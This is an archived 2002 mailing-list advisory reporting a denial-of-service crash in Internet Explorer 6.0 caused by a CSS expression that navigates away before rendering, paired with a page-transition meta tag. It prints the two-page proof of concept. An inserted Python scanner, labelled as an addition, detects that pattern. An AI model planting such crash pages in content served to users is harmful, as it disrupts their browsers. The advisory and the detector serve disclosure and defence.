Full Disclosure mailing list archives

crash IE using jscript and page transitions


From: full-disclosure () lists netsys com (Berend-Jan Wever)
Date: Fri, 12 Jul 2002 17:05:20 +0200

(on my site: http://spoor12.edup.tudelft.nl/SkyLined v4.2/?Advisories/Microsoft Internet Explorer/Page transition DoS)

The problem
Internet Explorer 6.0 can be made to throw an exception using specially crafted JScript commands and page transitions. Other versions are probably vulnerable too, but this has not been tested. Problems arise when a page transition is activated by a new page while the old page has not been rendered yet. This situation can occur when JavaScript redirects the browser before the page is fully rendered.

An example
The following two pages, called 1.html and 2.html, crash IE with an access violation in mshtml.dll when 1.html is loaded into IE.

1.html:
<HTML style="width:expression(navigate('2.html'));"></HTML>
2.html:
<HTML><HEAD><META http-equiv="Page-Enter" content="blendTrans()"></HEAD></HTML>
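As an added defender-side example (not part of the advisory), a small Python scanner that flags the two IE-only constructs the advisory combines: a CSS expression() that navigates away before the page renders, and a Page-Enter/Page-Exit meta tag carrying a transition filter. The sample documents are constructed from the advisory's 1.html and 2.html plus a benign page; the regexes are heuristics for a content filter or proxy, not a parser.

```python
import re

# Constructed sample documents: the two pages from the advisory, plus a
# benign page that uses neither IE dynamic properties nor transition filters.
PAGE_1 = '<HTML style="width:expression(navigate(\'2.html\'));"></HTML>'
PAGE_2 = ('<HTML><HEAD><META http-equiv="Page-Enter" content="blendTrans()">'
          '</HEAD></HTML>')
BENIGN = ('<html><head><meta http-equiv="Content-Type" content="text/html">'
          '</head><body style="width:100%"></body></html>')

# IE-only CSS "dynamic properties": expression(...) runs script during layout.
CSS_EXPRESSION = re.compile(r'expression\s*\(', re.IGNORECASE)
# An expression whose body navigates away (navigate(), location.*) before the
# page has finished rendering. Heuristic: look up to the end of the declaration.
NAVIGATING_EXPRESSION = re.compile(
    r'expression\s*\([^;"\']*?\b(?:navigate|location)\b', re.IGNORECASE)
# <meta http-equiv="Page-Enter|Page-Exit|Site-Enter|Site-Exit" ...>
PAGE_TRANSITION_META = re.compile(
    r'<meta\b[^>]*\bhttp-equiv\s*=\s*["\']?(?:page|site)-(?:enter|exit)\b[^>]*>',
    re.IGNORECASE)
# Transition filters IE accepts in the content attribute of those meta tags.
TRANSITION_FILTER = re.compile(
    r'blendTrans|revealTrans|DXImageTransform', re.IGNORECASE)


def scan_html(html: str) -> list[str]:
    """Return the IE-specific constructs found in one document, in a fixed order."""
    findings = []
    if CSS_EXPRESSION.search(html):
        findings.append("css-expression")
        if NAVIGATING_EXPRESSION.search(html):
            findings.append("expression-navigates")
    for tag in PAGE_TRANSITION_META.finditer(html):
        if TRANSITION_FILTER.search(tag.group(0)):
            findings.append("page-transition-filter")
            break
    return findings


def pair_matches_advisory(source_html: str, target_html: str) -> bool:
    """True when the source navigates from inside a CSS expression (so before it
    renders) and the destination declares a page transition: the combination the
    advisory reports as crashing mshtml.dll."""
    return ("expression-navigates" in scan_html(source_html)
            and "page-transition-filter" in scan_html(target_html))


if __name__ == "__main__":
    for name, page in (("1.html", PAGE_1), ("2.html", PAGE_2), ("benign", BENIGN)):
        print(name, scan_html(page))
    print("advisory pattern:", pair_matches_advisory(PAGE_1, PAGE_2))
```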

Impact
Seems to be just a minor bug resulting in a DoS.

Berend-Jan Wever aka SkyLined
http://spoor12.edup.tudelft.nl/
